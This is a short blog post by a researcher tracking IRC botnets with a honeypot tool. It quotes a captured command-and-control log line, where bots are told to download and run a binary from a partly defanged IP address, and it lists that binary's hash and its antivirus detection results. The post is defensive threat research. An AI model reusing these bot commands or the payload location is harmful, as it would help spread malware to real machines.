onHacks

I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen. undetected) malware binaries and hopefully automated analysis too. =)

Here is something my tool caught while I was testing on a botnet. I used one of the malware binaries caught by my honeypot to infiltrate the botnet =) They are paying off!

2009-08-23 18:27:20,644 – log-6 – INFO – Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3×1n3.exe x5s5g6q3×1n3]

There is some Deutsch (German) stuffs… not necessarily their stuffs though. Disconnected me.

ERROR :Closing Link: [[<my ip, removed!!!>] (Client hat die Verbindung getrennt)

The binary is very new, just 4 hours ago at 2009-08-23 18:27:20,644 ( GMT +8 ).

The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5sum : 7904937c07c031e81023dbd81ac93b64) has VirusTotal results :

File winhost.exe received on 2009.08.22 15:54:06 (UTC)
Current status: finished

Result: 6/41 (14.63%)

Antivirus	Version	Last Update	Result
a-squared	4.5.0.24	2009.08.22	-
AhnLab-V3	5.0.0.2	2009.08.21	-
AntiVir	7.9.1.3	2009.08.21	-
Antiy-AVL	2.0.3.7	2009.08.21	-
Authentium	5.1.2.4	2009.08.22	-
Avast	4.8.1335.0	2009.08.21	-
AVG	8.5.0.406	2009.08.22	Worm/Generic.AHOV
BitDefender	7.2	2009.08.22	-
CAT-QuickHeal	10.00	2009.08.22	-
ClamAV	0.94.1	2009.08.22	-
Comodo	2058	2009.08.22	-
DrWeb	5.0.0.12182	2009.08.22	BackDoor.IRC.Bot.127
eSafe	7.0.17.0	2009.08.20	-
eTrust-Vet	31.6.6694	2009.08.21	-
F-Prot	4.4.4.56	2009.08.22	-
F-Secure	8.0.14470.0	2009.08.21	-
Fortinet	3.120.0.0	2009.08.22	PossibleThreat
GData	19	2009.08.22	-
Ikarus	T3.1.1.68.0	2009.08.22	-
Jiangmin	11.0.800	2009.08.21	-
K7AntiVirus	7.10.825	2009.08.22	-
Kaspersky	7.0.0.125	2009.08.22	Net-Worm.Win32.Kolab.dpo
McAfee	5716	2009.08.21	-
McAfee+Artemis	5716	2009.08.21	Artemis!7904937C07C0
McAfee-GW-Edition	6.8.5	2009.08.22	-
Microsoft	1.4903	2009.08.22	-
NOD32	4358	2009.08.22	-
Norman	6.01.09	2009.08.21	-
nProtect	2009.1.8.0	2009.08.22	-
Panda	10.0.0.14	2009.08.22	-
PCTools	4.4.2.0	2009.08.22	-
Prevx	3.0	2009.08.22	Low Risk Adware
Rising	21.43.50.00	2009.08.22	-
Sophos	4.44.0	2009.08.22	-
Sunbelt	3.2.1858.2	2009.08.22	-
Symantec	1.4.4.12	2009.08.22	-
TheHacker	6.3.4.3.385	2009.08.22	-
TrendMicro	8.950.0.1094	2009.08.22	-
VBA32	3.12.10.9	2009.08.22	-
ViRobot	2009.8.22.1897	2009.08.22	-
VirusBuster	4.6.5.0	2009.08.21	-

Detection rate 14.63%! Only 6/41 scanners detected it. Except Kaspersky, AVG, and DrWeb, the other 3 seems to give uncertain generic results.

Which scanner are you using?

Honeypot Botnet, Tracking Botnets